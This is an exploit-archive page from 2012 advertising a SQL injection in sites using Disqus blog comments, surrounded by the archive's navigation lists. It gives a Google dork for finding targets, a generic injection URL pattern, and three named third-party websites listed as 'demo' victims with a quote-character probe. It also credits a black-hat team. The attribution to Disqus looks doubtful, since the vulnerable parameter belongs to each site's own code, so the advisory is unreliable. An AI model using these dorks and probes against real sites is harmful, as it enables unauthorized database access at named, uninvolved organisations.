Disqus Blog Comments SQL Injection

Disqus Blog Comments SQL Injection: Posted Aug 29, 2012; Authored by Spy_w4r3; Disqus Blog Comments suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | d153d27a4a6e5a7b4b64cb53d6872723f2de5a385ce4b520ca8623a249712a95; Download | Favorite | View

Disqus Blog Comments SQL Injection

:----------------------------------------------------------------------------------------------------------------------------------------:
Blog Comments Powered By Disqus <- Sql Injection
:----------------------------------------------------------------------------------------------------------------------------------------:
 
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title: Blog Comments Powered By Disqus
: # Date: 28 August 2012
: # Author: Spy_w4r3
: # # Vendor or Software Link: http://disqus.com
: # Category : Web Applications
: # Google dork: inurl:/index.php?id= intext:"Powered by Disqus"
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : Indonesian BlackHat Team, dr.spyc0d3r, syafm0vic007, budi_spielberg, zee.eichel, Xsan Lahci, ono_efeyu, wahyu_ade10, And Thia
:----------------------------------------------------------------------------------------------------------------------------------------:
 
# DORKS
:----------------------------------------------------------------------------------------------------------------------------------------:
inurl:/index.php?id= intext:"Powered by Disqus"
 
# Proof of Concept
:----------------------------------------------------------------------------------------------------------------------------------------:
SQL Injection : http://victim site/<path>/index.php?id=['SQL]
 
# Demo site:
:----------------------------------------------------------------------------------------------------------------------------------------:
http://fourtales.com/index.php?id=116'
http://blasternation.com/index.php?id=131'
http://www.gogetaroomie.com/index.php?id=298'
 
# Credits
:----------------------------------------------------------------------------------------------------------------------------------------:
http://indonesianblackhat.web.id | http://indonesianblackhat.web.id

Top Authors In Last 30 Days

Red Hat 145 files
Ubuntu 108 files
Debian 16 files
Rafael Pedrero 11 files
LiquidWorm 10 files
Google Security Research 9 files
Apple 9 files
Abdulhakim Oner 8 files
nu11secur1ty 8 files
Hubert Wojciechowski 6 files

File Archives

Systems

AIX (426)
Apple (1,960)
BSD (372)
CentOS (56)
Cisco (1,919)
Debian (6,714)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,288)
HPUX (878)
iOS (340)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,137)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,925)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,453)
UNIX (9,208)
UnixWare (185)
Windows (6,532)
Other

Disqus Blog Comments SQL Injection

Disqus Blog Comments SQL Injection

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Disqus Blog Comments SQL Injection

Share This

Disqus Blog Comments SQL Injection

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems